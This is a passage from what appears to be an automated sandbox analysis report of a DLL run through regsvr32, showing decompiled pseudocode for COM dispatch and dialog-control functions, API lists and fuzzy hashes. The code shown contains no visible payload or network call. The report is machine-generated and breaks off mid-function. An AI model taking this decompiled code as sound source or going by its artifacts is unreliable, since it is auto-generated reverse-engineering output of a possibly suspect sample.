                                                                                                                												_push( *((intOrPtr*)(_t252 + 0x14)));
                                                                                                                												_push( *((intOrPtr*)(_t252 + 0x10)));
                                                                                                                												_push( *((intOrPtr*)(_t252 + 0xc)));
                                                                                                                												if(_t246[8] != 0) {
                                                                                                                													 *((intOrPtr*)(_t252 - 0x4c)) =  *(_t252 - 0x3c) + 0x10;
                                                                                                                													 *(_t252 - 0x44) =  *(_t252 - 0x34) - 1;
                                                                                                                													_t195 =  *(_t252 + 8);
                                                                                                                													_t217 =  *((intOrPtr*)( *_t195 + 0x18))(_t195);
                                                                                                                													__eflags = _t217;
                                                                                                                													if(_t217 != 0) {
                                                                                                                														L47:
                                                                                                                														__imp__#9(_t252 - 0x5c);
                                                                                                                														__eflags = _t217 - 0x80020003;
                                                                                                                														if(_t217 != 0x80020003) {
                                                                                                                															goto L87;
                                                                                                                														}
                                                                                                                														L48:
                                                                                                                														__eflags = _t217 - 0x80020003;
                                                                                                                														if(_t217 != 0x80020003) {
                                                                                                                															goto L87;
                                                                                                                														}
                                                                                                                														__eflags =  *(_t252 - 0x14);
                                                                                                                														if( *(_t252 - 0x14) != 0) {
                                                                                                                															 *(_t252 - 0x14) =  *(_t252 - 0x14) & 0x00000000;
                                                                                                                															__imp__#9( *(_t252 - 0x3c));
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                														}
                                                                                                                														goto L51;
                                                                                                                													}
                                                                                                                													__eflags =  *(_t252 - 0x5c) - 9;
                                                                                                                													if( *(_t252 - 0x5c) != 9) {
                                                                                                                														L44:
                                                                                                                														_t217 = 0x80020005;
                                                                                                                														goto L47;
                                                                                                                													}
                                                                                                                													_t198 =  *(_t252 - 0x54);
                                                                                                                													__eflags = _t198;
                                                                                                                													if(_t198 != 0) {
                                                                                                                														_push( *(_t252 + 0x28));
                                                                                                                														_push( *((intOrPtr*)(_t252 + 0x24)));
                                                                                                                														_push( *(_t252 + 0x20));
                                                                                                                														asm("movsd");
                                                                                                                														asm("movsd");
                                                                                                                														_t231 = _t252 - 0x4c;
                                                                                                                														_push(_t252 - 0x4c);
                                                                                                                														_push(4);
                                                                                                                														_push( *((intOrPtr*)(_t252 + 0x14)));
                                                                                                                														asm("movsd");
                                                                                                                														_push( *((intOrPtr*)(_t252 + 0x10)));
                                                                                                                														asm("movsd");
                                                                                                                														 *(_t252 - 0x44) =  *(_t252 - 0x30);
                                                                                                                														_push(0);
                                                                                                                														L46:
                                                                                                                														_t217 =  *((intOrPtr*)( *_t198 + 0x18))(_t198);
                                                                                                                														goto L47;
                                                                                                                													}
                                                                                                                													goto L44;
                                                                                                                												}
                                                                                                                												_t200 =  *(_t252 + 8);
                                                                                                                												_t217 =  *((intOrPtr*)( *_t200 + 0x18))(_t200);
                                                                                                                												__eflags = _t217;
                                                                                                                												if(_t217 != 0) {
                                                                                                                													goto L47;
                                                                                                                												}
                                                                                                                												__eflags =  *(_t252 - 0x5c) - 9;
                                                                                                                												if( *(_t252 - 0x5c) != 9) {
                                                                                                                													goto L44;
                                                                                                                												}
                                                                                                                												_t198 =  *(_t252 - 0x54);
                                                                                                                												__eflags = _t198;
                                                                                                                												if(_t198 == 0) {
                                                                                                                													goto L44;
                                                                                                                												}
                                                                                                                												_push( *(_t252 + 0x28));
                                                                                                                												_t231 = _t252 - 0x3c;
                                                                                                                												_push( *((intOrPtr*)(_t252 + 0x24)));
                                                                                                                												_push( *(_t252 + 0x20));
                                                                                                                												_push(_t252 - 0x3c);
                                                                                                                												_push(4);
                                                                                                                												_push( *((intOrPtr*)(_t252 + 0x14)));
                                                                                                                												_push( *((intOrPtr*)(_t252 + 0x10)));
                                                                                                                												_push(0);
                                                                                                                												goto L46;
                                                                                                                											}
                                                                                                                											__eflags =  *(_t188 + 8);
                                                                                                                											if( *(_t188 + 8) == 0) {
                                                                                                                												goto L35;
                                                                                                                											}
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											 *(_t252 - 0x14) = _t188;
                                                                                                                											asm("movsd");
                                                                                                                											E100235FF(_t188);
                                                                                                                											E10049170(_t252 - 0x6c, _t252 - 0x4c, 0, 0x10);
                                                                                                                											_t205 =  *((intOrPtr*)(_t252 - 0x64));
                                                                                                                											_t253 = _t253 + 0xc;
                                                                                                                											_t231 = _t252 - 0x4c;
                                                                                                                											_t217 =  *((intOrPtr*)( *_t205 + 0x18))(_t205, 0,  *((intOrPtr*)(_t252 + 0x10)),  *((intOrPtr*)(_t252 + 0x14)), 2, _t252 - 0x4c,  *(_t252 - 0x3c),  *((intOrPtr*)(_t252 + 0x24)),  *(_t252 + 0x28));
                                                                                                                											__eflags = _t217;
                                                                                                                											if(_t217 != 0) {
                                                                                                                												goto L48;
                                                                                                                											}
                                                                                                                											goto L35;
                                                                                                                										}
                                                                                                                										__eflags = _t245[0x10];
                                                                                                                										 *(_t252 + 0x20) = 0;
                                                                                                                										if(_t245[0x10] == 0) {
                                                                                                                											goto L31;
                                                                                                                										}
                                                                                                                										__eflags = _t245[0x14];
                                                                                                                										if(_t245[0x14] != 0) {
                                                                                                                											goto L31;
                                                                                                                										}
                                                                                                                										_t176 = 0x80020005;
                                                                                                                										goto L94;
                                                                                                                									}
                                                                                                                									_t207 = _t245[0x10];
                                                                                                                									__eflags = _t207;
                                                                                                                									if(_t207 != 0) {
                                                                                                                										L20:
                                                                                                                										__eflags = _t245[0x14];
                                                                                                                										if(_t245[0x14] == 0) {
                                                                                                                											goto L27;
                                                                                                                										}
                                                                                                                										L21:
                                                                                                                										_t208 = _t245[8];
                                                                                                                										__eflags = _t208;
                                                                                                                										if(_t208 == 0) {
                                                                                                                											_t209 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t209 = lstrlenA(_t208);
                                                                                                                										}
                                                                                                                										__eflags =  *(_t252 - 0x34) - _t209;
                                                                                                                										if( *(_t252 - 0x34) > _t209) {
                                                                                                                											 *(_t252 + 0x18) = 8;
                                                                                                                											 *(_t252 - 0x30) = 1;
                                                                                                                										} else {
                                                                                                                											 *(_t252 + 0x18) = 2;
                                                                                                                										}
                                                                                                                										goto L27;
                                                                                                                									}
                                                                                                                									__eflags = _t245[0x14];
                                                                                                                									if(_t245[0x14] == 0) {
                                                                                                                										goto L21;
                                                                                                                									}
                                                                                                                									__eflags = _t207;
                                                                                                                									if(_t207 != 0) {
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									__eflags = _t245[0x14];
                                                                                                                									if(_t245[0x14] != 0) {
                                                                                                                										goto L21;
                                                                                                                									}
                                                                                                                									__eflags = _t207;
                                                                                                                									if(_t207 == 0) {
                                                                                                                										goto L27;
                                                                                                                									}
                                                                                                                									goto L20;
                                                                                                                								}
                                                                                                                								_t176 = 0x80020003;
                                                                                                                								goto L94;
                                                                                                                							}
                                                                                                                							__eflags =  *(_t252 - 0x30) - 1;
                                                                                                                							if( *(_t252 - 0x30) != 1) {
                                                                                                                								L11:
                                                                                                                								_t176 = 0x80020007;
                                                                                                                								goto L94;
                                                                                                                							}
                                                                                                                							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t252 - 0x38)))) - 0xfffffffd;
                                                                                                                							if( *((intOrPtr*)( *((intOrPtr*)(_t252 - 0x38)))) == 0xfffffffd) {
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						_t176 = 0x8000ffff;
                                                                                                                						goto L94;
                                                                                                                					}
                                                                                                                					_t176 = 0x80020001;
                                                                                                                					goto L94;
                                                                                                                				} else {
                                                                                                                					_t176 = 0x80070057;
                                                                                                                					L94:
                                                                                                                					return E10047725(_t176);
                                                                                                                				}
                                                                                                                			}





























                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acfd
                                                                                                                0x00000000
                                                                                                                0x1003acfd
                                                                                                                0x1003aca8
                                                                                                                0x1003acac
                                                                                                                0x1003accd
                                                                                                                0x1003accd
                                                                                                                0x1003acd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acd2
                                                                                                                0x1003acd4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acd6
                                                                                                                0x1003acdb
                                                                                                                0x1003acb4
                                                                                                                0x1003acb4
                                                                                                                0x00000000
                                                                                                                0x1003acb4
                                                                                                                0x1003acdd
                                                                                                                0x1003acdf
                                                                                                                0x1003ace2
                                                                                                                0x1003ace5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acea
                                                                                                                0x00000000
                                                                                                                0x1003acea
                                                                                                                0x1003acae
                                                                                                                0x1003acb2
                                                                                                                0x1003acbe
                                                                                                                0x1003acc1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acc3
                                                                                                                0x00000000
                                                                                                                0x1003acc3
                                                                                                                0x00000000
                                                                                                                0x1003acb2
                                                                                                                0x1003ab23
                                                                                                                0x1003ab26
                                                                                                                0x1003ab2a
                                                                                                                0x1003ab7d
                                                                                                                0x1003ab7d
                                                                                                                0x1003ab80
                                                                                                                0x1003ab85
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ab94
                                                                                                                0x1003ab9c
                                                                                                                0x1003ab9f
                                                                                                                0x1003aba5
                                                                                                                0x1003aba8
                                                                                                                0x1003aba9
                                                                                                                0x1003abac
                                                                                                                0x1003abad
                                                                                                                0x1003abaf
                                                                                                                0x1003abb2
                                                                                                                0x1003abb5
                                                                                                                0x1003abb8
                                                                                                                0x1003abf9
                                                                                                                0x1003ac00
                                                                                                                0x1003ac03
                                                                                                                0x1003ac0c
                                                                                                                0x1003ac0e
                                                                                                                0x1003ac10
                                                                                                                0x1003ac56
                                                                                                                0x1003ac5a
                                                                                                                0x1003ac60
                                                                                                                0x1003ac66
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ac6c
                                                                                                                0x1003ac6c
                                                                                                                0x1003ac72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ac78
                                                                                                                0x1003ac7c
                                                                                                                0x1003ac81
                                                                                                                0x1003ac85
                                                                                                                0x1003ac91
                                                                                                                0x1003ac92
                                                                                                                0x1003ac93
                                                                                                                0x1003ac94
                                                                                                                0x1003ac94
                                                                                                                0x00000000
                                                                                                                0x1003ac7c
                                                                                                                0x1003ac12
                                                                                                                0x1003ac17
                                                                                                                0x1003ac20
                                                                                                                0x1003ac20
                                                                                                                0x00000000
                                                                                                                0x1003ac20
                                                                                                                0x1003ac19
                                                                                                                0x1003ac1c
                                                                                                                0x1003ac1e
                                                                                                                0x1003ac27
                                                                                                                0x1003ac2d
                                                                                                                0x1003ac33
                                                                                                                0x1003ac39
                                                                                                                0x1003ac3a
                                                                                                                0x1003ac3b
                                                                                                                0x1003ac3e
                                                                                                                0x1003ac3f
                                                                                                                0x1003ac41
                                                                                                                0x1003ac44
                                                                                                                0x1003ac45
                                                                                                                0x1003ac48
                                                                                                                0x1003ac49
                                                                                                                0x1003ac4c
                                                                                                                0x1003ac4e
                                                                                                                0x1003ac54
                                                                                                                0x00000000
                                                                                                                0x1003ac54
                                                                                                                0x00000000
                                                                                                                0x1003ac1e
                                                                                                                0x1003abba
                                                                                                                0x1003abc3
                                                                                                                0x1003abc5
                                                                                                                0x1003abc7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003abcd
                                                                                                                0x1003abd2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003abd4
                                                                                                                0x1003abd7
                                                                                                                0x1003abd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003abdb
                                                                                                                0x1003abde
                                                                                                                0x1003abe1
                                                                                                                0x1003abe4
                                                                                                                0x1003abe7
                                                                                                                0x1003abe8
                                                                                                                0x1003abea
                                                                                                                0x1003abed
                                                                                                                0x1003abf0
                                                                                                                0x00000000
                                                                                                                0x1003abf0
                                                                                                                0x1003ab2c
                                                                                                                0x1003ab2f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ab36
                                                                                                                0x1003ab37
                                                                                                                0x1003ab38
                                                                                                                0x1003ab3a
                                                                                                                0x1003ab3d
                                                                                                                0x1003ab3e
                                                                                                                0x1003ab4b
                                                                                                                0x1003ab50
                                                                                                                0x1003ab53
                                                                                                                0x1003ab5e
                                                                                                                0x1003ab73
                                                                                                                0x1003ab75
                                                                                                                0x1003ab77
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ab77
                                                                                                                0x1003aaeb
                                                                                                                0x1003aaee
                                                                                                                0x1003aaf1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaf3
                                                                                                                0x1003aaf6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaf8
                                                                                                                0x00000000
                                                                                                                0x1003aaf8
                                                                                                                0x1003aa98
                                                                                                                0x1003aa9b
                                                                                                                0x1003aa9d
                                                                                                                0x1003aab1
                                                                                                                0x1003aab1
                                                                                                                0x1003aab4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aab6
                                                                                                                0x1003aab6
                                                                                                                0x1003aab9
                                                                                                                0x1003aabb
                                                                                                                0x1003aac6
                                                                                                                0x1003aac6
                                                                                                                0x1003aabd
                                                                                                                0x1003aabe
                                                                                                                0x1003aabe
                                                                                                                0x1003aac8
                                                                                                                0x1003aacb
                                                                                                                0x1003aad6
                                                                                                                0x1003aadd
                                                                                                                0x1003aacd
                                                                                                                0x1003aacd
                                                                                                                0x1003aacd
                                                                                                                0x00000000
                                                                                                                0x1003aacb
                                                                                                                0x1003aa9f
                                                                                                                0x1003aaa2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaa4
                                                                                                                0x1003aaa6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaa8
                                                                                                                0x1003aaab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaad
                                                                                                                0x1003aaaf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaaf
                                                                                                                0x1003aa85
                                                                                                                0x00000000
                                                                                                                0x1003aa85
                                                                                                                0x1003aa5b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3886170330-0
                                                                                                                • Opcode ID: 1c311965c9a92a02b697ca34eca03049ffc86a8a04e0e787f99ca824f4c7da7d
                                                                                                                • Instruction ID: c00d073da36ce4a3099d45c3b5c3b3b3ddb30e769adc7a323fe00a858e7edfc9
                                                                                                                • Opcode Fuzzy Hash: 1c311965c9a92a02b697ca34eca03049ffc86a8a04e0e787f99ca824f4c7da7d
                                                                                                                • Instruction Fuzzy Hash: E1E16631D0064A9FCF13CF90C880A8EB7F2EF4A396F21461AF955AF260D7759981DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E1001D1D8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t133;
                                                                                                                				intOrPtr* _t140;
                                                                                                                				int _t145;
                                                                                                                				signed short _t148;
                                                                                                                				short* _t149;
                                                                                                                				intOrPtr _t152;
                                                                                                                				signed short _t177;
                                                                                                                				intOrPtr _t178;
                                                                                                                				signed int _t179;
                                                                                                                				intOrPtr _t184;
                                                                                                                				struct tagRECT _t189;
                                                                                                                				int _t190;
                                                                                                                				void* _t191;
                                                                                                                				signed short _t193;
                                                                                                                				signed short _t194;
                                                                                                                				void* _t195;
                                                                                                                				void* _t221;
                                                                                                                				intOrPtr _t225;
                                                                                                                				short _t226;
                                                                                                                				intOrPtr* _t233;
                                                                                                                				void* _t234;
                                                                                                                				signed short* _t236;
                                                                                                                				signed int _t240;
                                                                                                                				void* _t241;
                                                                                                                				signed short* _t242;
                                                                                                                				signed short* _t244;
                                                                                                                				signed short* _t245;
                                                                                                                				signed int _t246;
                                                                                                                				void* _t248;
                                                                                                                
                                                                                                                				_t246 = _t248 - 0x44;
                                                                                                                				_t133 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t246 + 0x48) = _t133 ^ _t246;
                                                                                                                				_push(0x50);
                                                                                                                				E1004764D(0x1008f20e, __ebx, __edi, __esi);
                                                                                                                				_t233 =  *((intOrPtr*)(_t246 + 0x60));
                                                                                                                				_t236 =  *(_t246 + 0x68);
                                                                                                                				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
                                                                                                                				 *(_t246 + 8) =  *(_t246 + 0x58);
                                                                                                                				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
                                                                                                                				_t140 = _t233 + 0x12;
                                                                                                                				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
                                                                                                                				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
                                                                                                                					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
                                                                                                                					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
                                                                                                                					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
                                                                                                                					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
                                                                                                                					 *((short*)(_t246 - 0x12)) =  *_t140;
                                                                                                                					_t225 = _t233 + 0x18;
                                                                                                                					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
                                                                                                                					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
                                                                                                                					_t233 = _t246 - 0x20;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
                                                                                                                				}
                                                                                                                				_t226 =  *((short*)(_t233 + 0xa));
                                                                                                                				_t189 =  *((short*)(_t233 + 8));
                                                                                                                				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
                                                                                                                				 *(_t246 - 0x30) = _t189;
                                                                                                                				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
                                                                                                                				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
                                                                                                                				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
                                                                                                                				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
                                                                                                                				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
                                                                                                                					_t194 =  *_t236;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
                                                                                                                					_t236 =  &(_t236[2]);
                                                                                                                					if(_t194 > 0) {
                                                                                                                						__imp__#4(_t236, _t194);
                                                                                                                						_t195 = _t194 + _t194;
                                                                                                                						_t236 = _t236 + _t195;
                                                                                                                						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
                                                                                                                						 *(_t246 + 0x24) = _t145;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
                                                                                                                				L1000140B(_t246 + 0x28, E100184C0());
                                                                                                                				 *((intOrPtr*)(_t246 - 4)) = 0;
                                                                                                                				 *(_t246 + 0xc) = 0;
                                                                                                                				 *(_t246 + 0x10) = 0;
                                                                                                                				 *(_t246 + 0x18) = 0;
                                                                                                                				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
                                                                                                                					_t148 =  *_t236;
                                                                                                                					_t57 = _t148 - 0xc; // -12
                                                                                                                					_t226 = _t57;
                                                                                                                					_t236 =  &(_t236[6]);
                                                                                                                					 *_t246 = _t148;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
                                                                                                                					if(_t226 <= 0) {
                                                                                                                						L16:
                                                                                                                						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
                                                                                                                						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					do {
                                                                                                                						L8:
                                                                                                                						_t177 =  *_t236;
                                                                                                                						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
                                                                                                                						_t242 =  &(_t236[2]);
                                                                                                                						_t193 =  *_t242 & 0x0000ffff;
                                                                                                                						_t236 =  &(_t242[1]);
                                                                                                                						 *(_t246 + 4) = _t177;
                                                                                                                						if(_t177 != 0x80010001) {
                                                                                                                							_t178 = E10009F14(__eflags, 0x1c);
                                                                                                                							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
                                                                                                                							__eflags = _t178;
                                                                                                                							 *((char*)(_t246 - 4)) = 1;
                                                                                                                							if(_t178 == 0) {
                                                                                                                								_t179 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                							} else {
                                                                                                                								_t179 = E1002D3F6(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
                                                                                                                							}
                                                                                                                							 *((char*)(_t246 - 4)) = 0;
                                                                                                                							 *(_t246 + 0x20) = _t179;
                                                                                                                						} else {
                                                                                                                							_t244 =  &(_t236[2]);
                                                                                                                							 *(_t246 + 0x10) =  *_t236;
                                                                                                                							_t245 =  &(_t244[6]);
                                                                                                                							 *(_t246 + 0x18) =  *_t244;
                                                                                                                							L100011E5(_t246 + 0x28, _t245);
                                                                                                                							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
                                                                                                                							_t221 = 0xffffffef;
                                                                                                                							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
                                                                                                                							_t236 = _t245 + _t184 + 1;
                                                                                                                							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
                                                                                                                						}
                                                                                                                					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
                                                                                                                					_t148 =  *_t246;
                                                                                                                					goto L16;
                                                                                                                				} else {
                                                                                                                					L17:
                                                                                                                					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
                                                                                                                					_t263 =  *_t149 - 0x7b;
                                                                                                                					_push(_t246 + 0x38);
                                                                                                                					_push(_t149);
                                                                                                                					if( *_t149 != 0x7b) {
                                                                                                                						__imp__CLSIDFromProgID();
                                                                                                                					} else {
                                                                                                                						__imp__CLSIDFromString();
                                                                                                                					}
                                                                                                                					_t190 = 0;
                                                                                                                					_push(0);
                                                                                                                					_push( *((intOrPtr*)(_t246 + 0x6c)));
                                                                                                                					_push(_t236);
                                                                                                                					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
                                                                                                                					E100337E7(0, _t246 - 0x5c, _t233, _t236, _t263);
                                                                                                                					 *((char*)(_t246 - 4)) = 2;
                                                                                                                					 *((intOrPtr*)(_t246 + 0x34)) = 0;
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
                                                                                                                					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
                                                                                                                					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
                                                                                                                						_push(1);
                                                                                                                						if(E1002B024(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E1002B631( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
                                                                                                                							E1002C926( *((intOrPtr*)(_t246 + 0x34)), 1);
                                                                                                                							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
                                                                                                                							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
                                                                                                                							E10018A1F(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
                                                                                                                							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
                                                                                                                							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
                                                                                                                							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *(_t246 + 0x24) != _t190) {
                                                                                                                						__imp__#6( *(_t246 + 0x24));
                                                                                                                					}
                                                                                                                					_t152 =  *((intOrPtr*)(_t246 + 0x34));
                                                                                                                					if(_t152 == _t190) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
                                                                                                                						_t190 = 1;
                                                                                                                					}
                                                                                                                					 *((char*)(_t246 - 4)) = 0;
                                                                                                                					E10033B9C(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
                                                                                                                					L100013E3( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
                                                                                                                					_pop(_t234);
                                                                                                                					_pop(_t241);
                                                                                                                					_pop(_t191);
                                                                                                                					return E1004763E(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
                                                                                                                				}
                                                                                                                			}


































                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001D1F1
                                                                                                                • MapDialogRect.USER32(?,00000000), ref: 1001D282
                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 1001D2A1
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 1001D393
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 1001D39B
                                                                                                                • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 1001D435
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1001D487
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2841959276-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100172B0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char* _v20;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v52;
                                                                                                                				signed int _v56;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t122;
                                                                                                                				void* _t128;
                                                                                                                				intOrPtr _t130;
                                                                                                                				signed int _t139;
                                                                                                                				signed int _t144;
                                                                                                                				signed int _t175;
                                                                                                                				signed int _t177;
                                                                                                                				signed int _t179;
                                                                                                                				signed int _t181;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t187;
                                                                                                                				void* _t190;
                                                                                                                				intOrPtr _t191;
                                                                                                                				signed int _t201;
                                                                                                                
                                                                                                                				_t190 = __ecx;
